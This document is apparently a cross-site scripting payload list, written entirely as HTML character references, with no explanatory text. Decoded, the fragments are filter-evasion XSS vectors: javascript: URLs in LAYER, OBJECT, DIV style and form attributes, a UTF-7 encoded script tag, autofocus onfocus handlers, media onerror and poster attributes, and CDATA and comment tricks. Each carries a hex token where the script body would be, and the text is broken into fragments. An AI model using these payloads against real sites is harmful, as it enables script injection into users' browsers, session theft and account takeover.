amp;#102&amp;#100&amp;#56&amp;#53&amp;#55&amp;#56&amp;#52&amp;#101&amp;#98&amp;#98&amp;#99&amp;#52&amp;#50&amp;#97&amp;#98&amp;#101&amp;#53&amp;#102&amp;#49&amp;#102&amp;#55&amp;#48&amp;#98&amp;#101&amp;#98&amp;#99&amp;#102&amp;#51&amp;#48&amp;#101&amp;#53&amp;#60&amp;#47&amp;#83&amp;#67&amp;#82&amp;#73&amp;#80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6&amp;#65&amp;#89&amp;#69&amp;#82&amp;#32&amp;#83&amp;#82&amp;#67&amp;#61&amp;#34&amp;#106&amp;#97&amp;#118&amp;#97&amp;#115&amp;#99&amp;#114&amp;#105&amp;#112&amp;#116&amp;#58&amp;#57&amp;#97&amp;#55&amp;#55&amp;#57&amp;#102&amp;#98&amp;#49&amp;#100&amp;#56&amp;#101&amp;#101&amp;#55&amp;#102&amp;#55&amp;#98&amp;#51&amp;#101&amp;#101&amp;#102&amp;#99&amp;#102&amp;#97&amp;#100&amp;#52&amp;#56&amp;#55&amp;#98&amp;#57&amp;#56&amp;#56&amp;#102&amp;#62&amp;#60&amp;#47&amp;#76&amp;#65&amp;#89&amp;#69&amp;#82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3&amp;#84&amp;#89&amp;#76&amp;#69&amp;#62&amp;#108&amp;#105&amp;#32&amp;#123&amp;#108&amp;#105&amp;#115&amp;#116&amp;#45&amp;#115&amp;#116&amp;#121&amp;#108&amp;#101&amp;#45&amp;#105&amp;#109&amp;#97&amp;#103&amp;#101&amp;#58&amp;#32&amp;#117&amp;#114&amp;#108&amp;#40&amp;#34&amp;#50&amp;#98&amp;#48&amp;#57&amp;#54&amp;#101&amp;#50&amp;#50&amp;#54&amp;#56&amp;#52&amp;#97&amp;#100&amp;#50&amp;#52&amp;#101&amp;#49&amp;#51&amp;#53&amp;#97&amp;#51&amp;#50&amp;#56&amp;#54&amp;#100&amp;#56&amp;#50&amp;#100&amp;#102&amp;#98&amp;#100&amp;#51&amp;#60&amp;#47&amp;#83&amp;#84&amp;#89&amp;#76&amp;#69&amp;#62&amp;#60&amp;#85&amp;#76&amp;#62&amp;#60&amp;#76&amp;#73&amp;#62&amp;#50&amp;#98&amp;#48&amp;#57&amp;#54&amp;#101&amp;#50&amp;#50&amp;#54&amp;#56&amp;#52&amp;#97&amp;#100&amp;#50&amp;#52&amp;#101&amp;#49&amp;#51&amp;#53&amp;#97&amp;#51&amp;#50&amp;#56&amp;#54&amp;#100&amp;#56&amp;#50&amp;#100&amp;#102&amp;#98&amp;#100&amp;#5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8&amp;#73&amp;#86&amp;#32&amp;#83&amp;#84&amp;#89&amp;#76&amp;#69&amp;#61&amp;#34&amp;#98&amp;#97&amp;#99&amp;#107&amp;#103&amp;#114&amp;#111&amp;#117&amp;#110&amp;#100&amp;#45&amp;#105&amp;#109&amp;#97&amp;#103&amp;#101&amp;#58&amp;#32&amp;#117&amp;#114&amp;#108&amp;#40&amp;#38&amp;#35&amp;#49&amp;#59&amp;#106&amp;#97&amp;#118&amp;#97&amp;#115&amp;#99&amp;#114&amp;#105&amp;#112&amp;#116&amp;#58&amp;#49&amp;#55&amp;#51&amp;#51&amp;#51&amp;#56&amp;#102&amp;#50&amp;#99&amp;#48&amp;#57&amp;#101&amp;#53&amp;#102&amp;#100&amp;#100&amp;#99&amp;#50&amp;#50&amp;#49&amp;#97&amp;#101&amp;#53&amp;#52&amp;#97&amp;#100&amp;#53&amp;#53&amp;#98&amp;#52&amp;#49&amp;#102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2&amp;#69&amp;#65&amp;#68&amp;#62&amp;#60&amp;#77&amp;#69&amp;#84&amp;#65&amp;#32&amp;#72&amp;#84&amp;#84&amp;#80&amp;#45&amp;#69&amp;#81&amp;#85&amp;#73&amp;#86&amp;#61&amp;#34&amp;#67&amp;#79&amp;#78&amp;#84&amp;#69&amp;#78&amp;#84&amp;#45&amp;#84&amp;#89&amp;#80&amp;#69&amp;#34&amp;#32&amp;#67&amp;#79&amp;#78&amp;#84&amp;#69&amp;#78&amp;#84&amp;#61&amp;#34&amp;#116&amp;#101&amp;#120&amp;#116&amp;#47&amp;#104&amp;#116&amp;#109&amp;#108&amp;#59&amp;#32&amp;#99&amp;#104&amp;#97&amp;#114&amp;#115&amp;#101&amp;#116&amp;#61&amp;#85&amp;#84&amp;#70&amp;#45&amp;#55&amp;#34&amp;#62&amp;#60&amp;#47&amp;#72&amp;#69&amp;#65&amp;#68&amp;#62&amp;#43&amp;#65&amp;#68&amp;#119&amp;#45&amp;#83&amp;#67&amp;#82&amp;#73&amp;#80&amp;#84&amp;#43&amp;#65&amp;#68&amp;#52&amp;#45&amp;#99&amp;#100&amp;#55&amp;#100&amp;#100&amp;#51&amp;#53&amp;#55&amp;#51&amp;#51&amp;#52&amp;#99&amp;#101&amp;#98&amp;#51&amp;#101&amp;#51&amp;#97&amp;#97&amp;#56&amp;#102&amp;#48&amp;#50&amp;#51&amp;#50&amp;#52&amp;#49&amp;#99&amp;#48&amp;#100&amp;#48&amp;#49&amp;#43&amp;#65&amp;#68&amp;#119&amp;#45&amp;#47&amp;#83&amp;#67&amp;#82&amp;#73&amp;#80&amp;#84&amp;#43&amp;#65&amp;#68&amp;#52&amp;#4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97&amp;#32&amp;#104&amp;#114&amp;#101&amp;#102&amp;#61&amp;#34&amp;#106&amp;#97&amp;#118&amp;#97&amp;#115&amp;#99&amp;#114&amp;#105&amp;#112&amp;#116&amp;#35&amp;#98&amp;#54&amp;#56&amp;#51&amp;#48&amp;#97&amp;#56&amp;#97&amp;#99&amp;#48&amp;#53&amp;#56&amp;#101&amp;#55&amp;#55&amp;#50&amp;#99&amp;#52&amp;#53&amp;#97&amp;#57&amp;#55&amp;#55&amp;#50&amp;#56&amp;#54&amp;#53&amp;#98&amp;#57&amp;#57&amp;#48&amp;#56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10&amp;#112&amp;#117&amp;#116&amp;#32&amp;#116&amp;#121&amp;#112&amp;#101&amp;#61&amp;#34&amp;#105&amp;#109&amp;#97&amp;#103&amp;#101&amp;#34&amp;#32&amp;#100&amp;#121&amp;#110&amp;#115&amp;#114&amp;#99&amp;#61&amp;#34&amp;#101&amp;#50&amp;#55&amp;#102&amp;#49&amp;#97&amp;#52&amp;#101&amp;#97&amp;#97&amp;#99&amp;#50&amp;#57&amp;#57&amp;#97&amp;#52&amp;#50&amp;#101&amp;#49&amp;#51&amp;#98&amp;#102&amp;#53&amp;#51&amp;#99&amp;#52&amp;#52&amp;#97&amp;#50&amp;#97&amp;#57&amp;#4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38&amp;#98&amp;#102&amp;#52&amp;#49&amp;#54&amp;#101&amp;#54&amp;#51&amp;#57&amp;#56&amp;#49&amp;#102&amp;#54&amp;#52&amp;#99&amp;#55&amp;#53&amp;#53&amp;#97&amp;#102&amp;#48&amp;#100&amp;#50&amp;#55&amp;#57&amp;#101&amp;#54&amp;#102&amp;#57&amp;#56&amp;#48&amp;#56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38&amp;#123&amp;#99&amp;#50&amp;#100&amp;#55&amp;#55&amp;#49&amp;#57&amp;#99&amp;#101&amp;#51&amp;#102&amp;#56&amp;#49&amp;#97&amp;#53&amp;#97&amp;#100&amp;#97&amp;#56&amp;#48&amp;#54&amp;#54&amp;#48&amp;#100&amp;#49&amp;#100&amp;#98&amp;#57&amp;#51&amp;#56&amp;#102&amp;#52&amp;#125&amp;#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3&amp;#77&amp;#71&amp;#32&amp;#83&amp;#82&amp;#67&amp;#61&amp;#38&amp;#123&amp;#101&amp;#49&amp;#51&amp;#97&amp;#52&amp;#55&amp;#97&amp;#97&amp;#100&amp;#53&amp;#52&amp;#56&amp;#49&amp;#52&amp;#99&amp;#101&amp;#54&amp;#54&amp;#99&amp;#56&amp;#56&amp;#55&amp;#51&amp;#102&amp;#48&amp;#53&amp;#57&amp;#102&amp;#56&amp;#53&amp;#100&amp;#98&amp;#125&amp;#59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97&amp;#32&amp;#104&amp;#114&amp;#101&amp;#102&amp;#61&amp;#34&amp;#97&amp;#98&amp;#111&amp;#117&amp;#116&amp;#58&amp;#50&amp;#52&amp;#97&amp;#101&amp;#100&amp;#55&amp;#100&amp;#99&amp;#101&amp;#48&amp;#101&amp;#49&amp;#100&amp;#100&amp;#101&amp;#101&amp;#49&amp;#56&amp;#55&amp;#51&amp;#55&amp;#56&amp;#55&amp;#57&amp;#51&amp;#51&amp;#55&amp;#50&amp;#101&amp;#50&amp;#102&amp;#97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68&amp;#73&amp;#86&amp;#32&amp;#83&amp;#84&amp;#89&amp;#76&amp;#69&amp;#61&amp;#34&amp;#98&amp;#105&amp;#110&amp;#100&amp;#105&amp;#110&amp;#103&amp;#58&amp;#32&amp;#117&amp;#114&amp;#108&amp;#40&amp;#106&amp;#97&amp;#118&amp;#97&amp;#115&amp;#99&amp;#114&amp;#105&amp;#112&amp;#116&amp;#58&amp;#100&amp;#52&amp;#52&amp;#99&amp;#49&amp;#51&amp;#99&amp;#98&amp;#102&amp;#54&amp;#52&amp;#48&amp;#53&amp;#98&amp;#100&amp;#101&amp;#52&amp;#49&amp;#52&amp;#99&amp;#53&amp;#55&amp;#97&amp;#102&amp;#49&amp;#101&amp;#100&amp;#55&amp;#98&amp;#49&amp;#50&amp;#56&amp;#41&amp;#59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79&amp;#66&amp;#74&amp;#69&amp;#67&amp;#84&amp;#32&amp;#99&amp;#108&amp;#97&amp;#115&amp;#115&amp;#105&amp;#100&amp;#61&amp;#99&amp;#108&amp;#115&amp;#105&amp;#100&amp;#58&amp;#46&amp;#46&amp;#46&amp;#34&amp;#32&amp;#99&amp;#111&amp;#100&amp;#101&amp;#98&amp;#97&amp;#115&amp;#101&amp;#61&amp;#34&amp;#106&amp;#97&amp;#118&amp;#97&amp;#115&amp;#99&amp;#114&amp;#105&amp;#112&amp;#116&amp;#58&amp;#102&amp;#102&amp;#97&amp;#53&amp;#53&amp;#98&amp;#56&amp;#98&amp;#56&amp;#100&amp;#101&amp;#100&amp;#100&amp;#50&amp;#97&amp;#53&amp;#100&amp;#54&amp;#98&amp;#55&amp;#57&amp;#50&amp;#102&amp;#100&amp;#53&amp;#49&amp;#49&amp;#56&amp;#50&amp;#49&amp;#102&amp;#102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15&amp;#116&amp;#121&amp;#108&amp;#101&amp;#62&amp;#60&amp;#33&amp;#45&amp;#45&amp;#60&amp;#47&amp;#115&amp;#116&amp;#121&amp;#108&amp;#101&amp;#62&amp;#60&amp;#83&amp;#67&amp;#82&amp;#73&amp;#80&amp;#84&amp;#62&amp;#56&amp;#98&amp;#52&amp;#56&amp;#101&amp;#49&amp;#52&amp;#99&amp;#52&amp;#100&amp;#100&amp;#100&amp;#54&amp;#49&amp;#100&amp;#99&amp;#50&amp;#56&amp;#57&amp;#101&amp;#56&amp;#48&amp;#97&amp;#52&amp;#99&amp;#100&amp;#49&amp;#48&amp;#55&amp;#50&amp;#56&amp;#51&amp;#47&amp;#47&amp;#45&amp;#45&amp;#62&amp;#60&amp;#47&amp;#83&amp;#67&amp;#82&amp;#73&amp;#80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33&amp;#91&amp;#67&amp;#68&amp;#65&amp;#84&amp;#65&amp;#91&amp;#60&amp;#33&amp;#45&amp;#45&amp;#93&amp;#93&amp;#60&amp;#83&amp;#67&amp;#82&amp;#73&amp;#80&amp;#84&amp;#62&amp;#97&amp;#98&amp;#101&amp;#97&amp;#56&amp;#100&amp;#49&amp;#53&amp;#100&amp;#55&amp;#55&amp;#98&amp;#54&amp;#54&amp;#97&amp;#56&amp;#57&amp;#49&amp;#56&amp;#54&amp;#49&amp;#49&amp;#102&amp;#49&amp;#52&amp;#51&amp;#101&amp;#56&amp;#55&amp;#52&amp;#50&amp;#53&amp;#47&amp;#47&amp;#45&amp;#45&amp;#62&amp;#60&amp;#47&amp;#83&amp;#67&amp;#82&amp;#73&amp;#80&amp;#8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33&amp;#45&amp;#45&amp;#32&amp;#45&amp;#45&amp;#32&amp;#45&amp;#45&amp;#62&amp;#50&amp;#54&amp;#50&amp;#54&amp;#53&amp;#53&amp;#50&amp;#55&amp;#98&amp;#97&amp;#102&amp;#48&amp;#54&amp;#54&amp;#49&amp;#100&amp;#99&amp;#97&amp;#97&amp;#54&amp;#54&amp;#53&amp;#52&amp;#98&amp;#100&amp;#56&amp;#55&amp;#52&amp;#54&amp;#54&amp;#101&amp;#98&amp;#60&amp;#33&amp;#45&amp;#45&amp;#32&amp;#45&amp;#45&amp;#32&amp;#45&amp;#45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20&amp;#109&amp;#108&amp;#32&amp;#105&amp;#100&amp;#61&amp;#34&amp;#88&amp;#34&amp;#62&amp;#60&amp;#97&amp;#62&amp;#60&amp;#98&amp;#62&amp;#97&amp;#57&amp;#101&amp;#98&amp;#53&amp;#57&amp;#97&amp;#50&amp;#56&amp;#53&amp;#54&amp;#55&amp;#55&amp;#102&amp;#57&amp;#101&amp;#98&amp;#54&amp;#50&amp;#51&amp;#57&amp;#57&amp;#49&amp;#98&amp;#97&amp;#98&amp;#98&amp;#48&amp;#51&amp;#50&amp;#97&amp;#53&amp;#59&amp;#60&amp;#98&amp;#62&amp;#60&amp;#47&amp;#97&amp;#62&amp;#60&amp;#47&amp;#120&amp;#109&amp;#108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0&amp;#105&amp;#118&amp;#32&amp;#100&amp;#97&amp;#116&amp;#97&amp;#102&amp;#108&amp;#100&amp;#61&amp;#34&amp;#98&amp;#34&amp;#32&amp;#100&amp;#97&amp;#116&amp;#97&amp;#102&amp;#111&amp;#114&amp;#109&amp;#97&amp;#116&amp;#97&amp;#115&amp;#61&amp;#34&amp;#104&amp;#116&amp;#109&amp;#108&amp;#34&amp;#32&amp;#100&amp;#97&amp;#116&amp;#97&amp;#115&amp;#114&amp;#99&amp;#61&amp;#34&amp;#35&amp;#54&amp;#49&amp;#57&amp;#57&amp;#53&amp;#52&amp;#50&amp;#53&amp;#101&amp;#102&amp;#52&amp;#53&amp;#48&amp;#55&amp;#97&amp;#50&amp;#56&amp;#49&amp;#100&amp;#99&amp;#48&amp;#51&amp;#101&amp;#97&amp;#52&amp;#56&amp;#49&amp;#97&amp;#99&amp;#49&amp;#53&amp;#100&amp;#34&amp;#62&amp;#60&amp;#47&amp;#100&amp;#105&amp;#118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88&amp;#77&amp;#76&amp;#32&amp;#73&amp;#68&amp;#61&amp;#73&amp;#62&amp;#60&amp;#88&amp;#62&amp;#60&amp;#67&amp;#62&amp;#60&amp;#33&amp;#91&amp;#67&amp;#68&amp;#65&amp;#84&amp;#65&amp;#91&amp;#60&amp;#73&amp;#77&amp;#71&amp;#32&amp;#83&amp;#82&amp;#67&amp;#61&amp;#34&amp;#106&amp;#97&amp;#118&amp;#97&amp;#115&amp;#93&amp;#93&amp;#60&amp;#33&amp;#91&amp;#67&amp;#68&amp;#65&amp;#84&amp;#65&amp;#91&amp;#99&amp;#114&amp;#105&amp;#112&amp;#116&amp;#58&amp;#50&amp;#98&amp;#51&amp;#55&amp;#49&amp;#52&amp;#56&amp;#48&amp;#50&amp;#54&amp;#49&amp;#98&amp;#51&amp;#56&amp;#54&amp;#99&amp;#99&amp;#98&amp;#99&amp;#57&amp;#55&amp;#99&amp;#99&amp;#53&amp;#50&amp;#100&amp;#97&amp;#56&amp;#98&amp;#100&amp;#51&amp;#50&amp;#34&amp;#62&amp;#93&amp;#93&amp;#60&amp;#47&amp;#67&amp;#62&amp;#60&amp;#88&amp;#62&amp;#60&amp;#47&amp;#120&amp;#109&amp;#108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2&amp;#111&amp;#114&amp;#109&amp;#32&amp;#105&amp;#100&amp;#61&amp;#34&amp;#116&amp;#101&amp;#115&amp;#116&amp;#34&amp;#32&amp;#47&amp;#62&amp;#60&amp;#98&amp;#117&amp;#116&amp;#116&amp;#111&amp;#110&amp;#32&amp;#102&amp;#111&amp;#114&amp;#109&amp;#61&amp;#34&amp;#116&amp;#101&amp;#115&amp;#116&amp;#34&amp;#32&amp;#102&amp;#111&amp;#114&amp;#109&amp;#97&amp;#99&amp;#116&amp;#105&amp;#111&amp;#110&amp;#61&amp;#34&amp;#106&amp;#97&amp;#118&amp;#97&amp;#115&amp;#99&amp;#114&amp;#105&amp;#112&amp;#116&amp;#58&amp;#55&amp;#52&amp;#56&amp;#97&amp;#52&amp;#97&amp;#48&amp;#54&amp;#54&amp;#56&amp;#97&amp;#57&amp;#52&amp;#97&amp;#55&amp;#55&amp;#57&amp;#57&amp;#101&amp;#48&amp;#57&amp;#54&amp;#57&amp;#55&amp;#56&amp;#52&amp;#99&amp;#57&amp;#48&amp;#99&amp;#51&amp;#55&amp;#34&amp;#62&amp;#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10&amp;#112&amp;#117&amp;#116&amp;#32&amp;#111&amp;#110&amp;#102&amp;#111&amp;#99&amp;#117&amp;#115&amp;#61&amp;#106&amp;#97&amp;#118&amp;#97&amp;#115&amp;#99&amp;#114&amp;#105&amp;#112&amp;#116&amp;#58&amp;#55&amp;#49&amp;#54&amp;#55&amp;#97&amp;#50&amp;#57&amp;#97&amp;#55&amp;#49&amp;#54&amp;#97&amp;#100&amp;#98&amp;#52&amp;#98&amp;#99&amp;#55&amp;#54&amp;#99&amp;#100&amp;#97&amp;#52&amp;#99&amp;#49&amp;#52&amp;#57&amp;#51&amp;#56&amp;#51&amp;#98&amp;#97&amp;#32&amp;#97&amp;#117&amp;#116&amp;#111&amp;#102&amp;#111&amp;#99&amp;#117&amp;#115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15&amp;#101&amp;#108&amp;#101&amp;#99&amp;#116&amp;#32&amp;#111&amp;#110&amp;#102&amp;#111&amp;#99&amp;#117&amp;#115&amp;#61&amp;#106&amp;#97&amp;#118&amp;#97&amp;#115&amp;#99&amp;#114&amp;#105&amp;#112&amp;#116&amp;#58&amp;#100&amp;#56&amp;#55&amp;#97&amp;#54&amp;#48&amp;#55&amp;#100&amp;#57&amp;#48&amp;#49&amp;#100&amp;#49&amp;#98&amp;#99&amp;#55&amp;#49&amp;#98&amp;#52&amp;#48&amp;#56&amp;#50&amp;#97&amp;#97&amp;#97&amp;#48&amp;#102&amp;#57&amp;#51&amp;#101&amp;#51&amp;#51&amp;#32&amp;#97&amp;#117&amp;#116&amp;#111&amp;#102&amp;#111&amp;#99&amp;#117&amp;#115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16&amp;#101&amp;#120&amp;#116&amp;#97&amp;#114&amp;#101&amp;#97&amp;#32&amp;#111&amp;#110&amp;#102&amp;#111&amp;#99&amp;#117&amp;#115&amp;#61&amp;#106&amp;#97&amp;#118&amp;#97&amp;#115&amp;#99&amp;#114&amp;#105&amp;#112&amp;#116&amp;#58&amp;#99&amp;#48&amp;#99&amp;#55&amp;#54&amp;#49&amp;#55&amp;#52&amp;#55&amp;#99&amp;#48&amp;#57&amp;#98&amp;#101&amp;#49&amp;#102&amp;#102&amp;#100&amp;#51&amp;#100&amp;#102&amp;#50&amp;#100&amp;#50&amp;#51&amp;#102&amp;#57&amp;#54&amp;#101&amp;#52&amp;#102&amp;#100&amp;#32&amp;#97&amp;#117&amp;#116&amp;#111&amp;#102&amp;#111&amp;#99&amp;#117&amp;#115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7&amp;#101&amp;#121&amp;#103&amp;#101&amp;#110&amp;#32&amp;#111&amp;#110&amp;#102&amp;#111&amp;#99&amp;#117&amp;#115&amp;#61&amp;#106&amp;#97&amp;#118&amp;#97&amp;#115&amp;#99&amp;#114&amp;#105&amp;#112&amp;#116&amp;#58&amp;#97&amp;#52&amp;#49&amp;#48&amp;#54&amp;#57&amp;#101&amp;#51&amp;#48&amp;#98&amp;#101&amp;#51&amp;#101&amp;#54&amp;#54&amp;#48&amp;#52&amp;#48&amp;#56&amp;#49&amp;#55&amp;#102&amp;#102&amp;#100&amp;#100&amp;#50&amp;#97&amp;#48&amp;#100&amp;#98&amp;#97&amp;#50&amp;#32&amp;#97&amp;#117&amp;#116&amp;#111&amp;#102&amp;#111&amp;#99&amp;#117&amp;#115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05&amp;#110&amp;#112&amp;#117&amp;#116&amp;#32&amp;#111&amp;#110&amp;#98&amp;#108&amp;#117&amp;#114&amp;#61&amp;#106&amp;#97&amp;#118&amp;#97&amp;#115&amp;#99&amp;#114&amp;#105&amp;#112&amp;#116&amp;#58&amp;#55&amp;#99&amp;#51&amp;#98&amp;#100&amp;#99&amp;#57&amp;#55&amp;#51&amp;#53&amp;#55&amp;#56&amp;#102&amp;#55&amp;#54&amp;#57&amp;#52&amp;#99&amp;#51&amp;#56&amp;#100&amp;#55&amp;#99&amp;#52&amp;#97&amp;#56&amp;#53&amp;#99&amp;#97&amp;#49&amp;#53&amp;#56&amp;#32&amp;#97&amp;#117&amp;#116&amp;#111&amp;#102&amp;#111&amp;#99&amp;#117&amp;#115&amp;#62&amp;#60&amp;#105&amp;#110&amp;#112&amp;#117&amp;#116&amp;#32&amp;#97&amp;#117&amp;#116&amp;#111&amp;#102&amp;#111&amp;#99&amp;#117&amp;#115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18&amp;#105&amp;#100&amp;#101&amp;#111&amp;#32&amp;#112&amp;#111&amp;#115&amp;#116&amp;#101&amp;#114&amp;#61&amp;#106&amp;#97&amp;#118&amp;#97&amp;#115&amp;#99&amp;#114&amp;#105&amp;#112&amp;#116&amp;#58&amp;#97&amp;#52&amp;#55&amp;#57&amp;#50&amp;#51&amp;#56&amp;#102&amp;#102&amp;#52&amp;#54&amp;#48&amp;#97&amp;#57&amp;#100&amp;#49&amp;#56&amp;#52&amp;#57&amp;#49&amp;#55&amp;#55&amp;#56&amp;#50&amp;#57&amp;#100&amp;#57&amp;#56&amp;#56&amp;#50&amp;#99&amp;#56&amp;#47&amp;#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98&amp;#111&amp;#100&amp;#121&amp;#32&amp;#111&amp;#110&amp;#115&amp;#99&amp;#114&amp;#111&amp;#108&amp;#108&amp;#61&amp;#54&amp;#49&amp;#99&amp;#51&amp;#100&amp;#101&amp;#99&amp;#100&amp;#101&amp;#56&amp;#49&amp;#55&amp;#53&amp;#57&amp;#52&amp;#48&amp;#49&amp;#53&amp;#50&amp;#49&amp;#97&amp;#54&amp;#102&amp;#57&amp;#56&amp;#56&amp;#55&amp;#56&amp;#55&amp;#52&amp;#52&amp;#99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98&amp;#114&amp;#62&amp;#60&amp;#105&amp;#110&amp;#112&amp;#117&amp;#116&amp;#32&amp;#97&amp;#117&amp;#116&amp;#111&amp;#102&amp;#111&amp;#99&amp;#117&amp;#115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88&amp;#60&amp;#102&amp;#111&amp;#114&amp;#109&amp;#32&amp;#105&amp;#100&amp;#61&amp;#116&amp;#101&amp;#115&amp;#116&amp;#32&amp;#111&amp;#110&amp;#102&amp;#111&amp;#114&amp;#109&amp;#105&amp;#110&amp;#112&amp;#117&amp;#116&amp;#61&amp;#106&amp;#97&amp;#118&amp;#97&amp;#115&amp;#99&amp;#114&amp;#105&amp;#112&amp;#116&amp;#58&amp;#100&amp;#54&amp;#50&amp;#50&amp;#54&amp;#49&amp;#100&amp;#51&amp;#52&amp;#99&amp;#49&amp;#98&amp;#100&amp;#50&amp;#49&amp;#97&amp;#51&amp;#50&amp;#102&amp;#57&amp;#100&amp;#98&amp;#53&amp;#50&amp;#51&amp;#54&amp;#102&amp;#102&amp;#97&amp;#102&amp;#48&amp;#98&amp;#62&amp;#60&amp;#105&amp;#110&amp;#112&amp;#117&amp;#116&amp;#62&amp;#60&amp;#47&amp;#102&amp;#111&amp;#114&amp;#109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88&amp;#60&amp;#102&amp;#111&amp;#114&amp;#109&amp;#32&amp;#105&amp;#100&amp;#61&amp;#116&amp;#101&amp;#115&amp;#116&amp;#62&amp;#60&amp;#105&amp;#110&amp;#112&amp;#117&amp;#116&amp;#62&amp;#60&amp;#47&amp;#102&amp;#111&amp;#114&amp;#109&amp;#62&amp;#60&amp;#98&amp;#117&amp;#116&amp;#116&amp;#111&amp;#110&amp;#32&amp;#102&amp;#111&amp;#114&amp;#109&amp;#61&amp;#116&amp;#101&amp;#115&amp;#116&amp;#32&amp;#111&amp;#110&amp;#102&amp;#111&amp;#114&amp;#109&amp;#99&amp;#104&amp;#97&amp;#110&amp;#103&amp;#101&amp;#61&amp;#61&amp;#106&amp;#97&amp;#118&amp;#97&amp;#115&amp;#99&amp;#114&amp;#105&amp;#112&amp;#116&amp;#58&amp;#56&amp;#53&amp;#56&amp;#55&amp;#97&amp;#97&amp;#51&amp;#56&amp;#50&amp;#101&amp;#48&amp;#97&amp;#54&amp;#99&amp;#101&amp;#100&amp;#55&amp;#99&amp;#50&amp;#102&amp;#51&amp;#102&amp;#49&amp;#49&amp;#100&amp;#97&amp;#97&amp;#102&amp;#52&amp;#48&amp;#49&amp;#50&amp;#62&amp;#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18&amp;#105&amp;#100&amp;#101&amp;#111&amp;#62&amp;#60&amp;#115&amp;#111&amp;#117&amp;#114&amp;#99&amp;#101&amp;#32&amp;#111&amp;#110&amp;#101&amp;#114&amp;#114&amp;#111&amp;#114&amp;#61&amp;#34&amp;#106&amp;#97&amp;#118&amp;#97&amp;#115&amp;#99&amp;#114&amp;#105&amp;#112&amp;#116&amp;#58&amp;#100&amp;#99&amp;#54&amp;#50&amp;#53&amp;#98&amp;#97&amp;#55&amp;#52&amp;#54&amp;#100&amp;#98&amp;#100&amp;#56&amp;#53&amp;#98&amp;#97&amp;#50&amp;#48&amp;#49&amp;#98&amp;#56&amp;#50&amp;#54&amp;#57&amp;#49&amp;#98&amp;#100&amp;#49&amp;#54&amp;#99&amp;#52&amp;#34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60&amp;#118&amp;#105&amp;#100&amp;#101&amp;#111&amp;#32&amp;#111&amp;#110&amp;#101&amp;#114&amp;#114&amp;#111&amp;#114&amp;#61&amp;#34&amp;#106&amp;#97&amp;#118&amp;#97&amp;#115&amp;#99&amp;#114&amp;#105&amp;#112&amp;#116&amp;#58&amp;#50&amp;#54&amp;#101&amp;#55&amp;#53&amp;#101&amp;#52&amp;#101&amp;#101&amp;#54&amp;#102&amp;#57&amp;#57&amp;#97&amp;#57&amp;#52&amp;#48&amp;#102&amp;#102&amp;#97&amp;#55&amp;#101&amp;#53&amp;#56&amp;#97&amp;#98&amp;#100&amp;#48&amp;#57&amp;#55&amp;#55&amp;#50&amp;#34&amp;#62&amp;#60&amp;#115&amp;#111&amp;#117&amp;#114&amp;#99&amp;#101&amp;#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2;&amp;#x3e;&amp;#x66;&amp;#x38;&amp;#x31;&amp;#x66;&amp;#x35;&amp;#x65;&amp;#x64;&amp;#x30;&amp;#x62;&amp;#x66;&amp;#x30;&amp;#x39;&amp;#x37;&amp;#x66;&amp;#x38;&amp;#x34;&amp;#x33;&amp;#x63;&amp;#x31;&amp;#x62;&amp;#x31;&amp;#x62;&amp;#x61;&amp;#x66;&amp;#x34;&amp;#x34;&amp;#x66;&amp;#x65;&amp;#x63;&amp;#x62;&amp;#x65;&amp;#x30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2;&amp;#x3e;&amp;#x3c;&amp;#x53;&amp;#x43;&amp;#x52;&amp;#x49;&amp;#x50;&amp;#x54;&amp;#x3e;&amp;#x61;&amp;#x6c;&amp;#x65;&amp;#x72;&amp;#x74;&amp;#x28;&amp;#x27;&amp;#x35;&amp;#x63;&amp;#x38;&amp;#x38;&amp;#x61;&amp;#x62;&amp;#x39;&amp;#x38;&amp;#x66;&amp;#x62;&amp;#x31;&amp;#x31;&amp;#x35;&amp;#x31;&amp;#x36;&amp;#x36;&amp;#x37;&amp;#x66;&amp;#x38;&amp;#x31;&amp;#x39;&amp;#x39;&amp;#x39;&amp;#x31;&amp;#x37;&amp;#x33;&amp;#x39;&amp;#x35;&amp;#x66;&amp;#x65;&amp;#x38;&amp;#x64;&amp;#x27;&amp;#x29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7;&amp;#x27;&amp;#x3b;&amp;#x21;&amp;#x2d;&amp;#x2d;&amp;#x22;&amp;#x3c;&amp;#x65;&amp;#x35;&amp;#x39;&amp;#x66;&amp;#x34;&amp;#x30;&amp;#x39;&amp;#x62;&amp;#x61;&amp;#x65;&amp;#x39;&amp;#x33;&amp;#x64;&amp;#x66;&amp;#x62;&amp;#x33;&amp;#x64;&amp;#x37;&amp;#x34;&amp;#x31;&amp;#x62;&amp;#x65;&amp;#x39;&amp;#x61;&amp;#x33;&amp;#x30;&amp;#x64;&amp;#x30;&amp;#x37;&amp;#x36;&amp;#x38;&amp;#x34;&amp;#x3e;&amp;#x3d;&amp;#x26;&amp;#x7b;&amp;#x28;&amp;#x29;&amp;#x7d;&amp;#x22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2f;&amp;#x54;&amp;#x49;&amp;#x54;&amp;#x4c;&amp;#x45;&amp;#x3e;&amp;#x36;&amp;#x37;&amp;#x31;&amp;#x33;&amp;#x61;&amp;#x33;&amp;#x35;&amp;#x39;&amp;#x32;&amp;#x62;&amp;#x37;&amp;#x33;&amp;#x37;&amp;#x32;&amp;#x62;&amp;#x66;&amp;#x32;&amp;#x66;&amp;#x62;&amp;#x32;&amp;#x31;&amp;#x31;&amp;#x63;&amp;#x62;&amp;#x62;&amp;#x30;&amp;#x66;&amp;#x61;&amp;#x64;&amp;#x65;&amp;#x64;&amp;#x36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2;&amp;#x3e;&amp;#x3c;&amp;#x69;&amp;#x6d;&amp;#x67;&amp;#x20;&amp;#x73;&amp;#x72;&amp;#x63;&amp;#x3d;&amp;#x22;&amp;#x78;&amp;#x3a;&amp;#x78;&amp;#x22;&amp;#x20;&amp;#x6f;&amp;#x6e;&amp;#x65;&amp;#x72;&amp;#x72;&amp;#x6f;&amp;#x72;&amp;#x3d;&amp;#x22;&amp;#x62;&amp;#x32;&amp;#x34;&amp;#x39;&amp;#x64;&amp;#x63;&amp;#x38;&amp;#x35;&amp;#x38;&amp;#x35;&amp;#x38;&amp;#x63;&amp;#x32;&amp;#x31;&amp;#x35;&amp;#x33;&amp;#x64;&amp;#x61;&amp;#x36;&amp;#x39;&amp;#x35;&amp;#x65;&amp;#x31;&amp;#x64;&amp;#x31;&amp;#x34;&amp;#x31;&amp;#x63;&amp;#x61;&amp;#x62;&amp;#x61;&amp;#x3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f;&amp;#x44;&amp;#x59;&amp;#x20;&amp;#x6f;&amp;#x6e;&amp;#x6c;&amp;#x6f;&amp;#x61;&amp;#x64;&amp;#x21;&amp;#x23;&amp;#x24;&amp;#x25;&amp;#x26;&amp;#x28;&amp;#x29;&amp;#x2a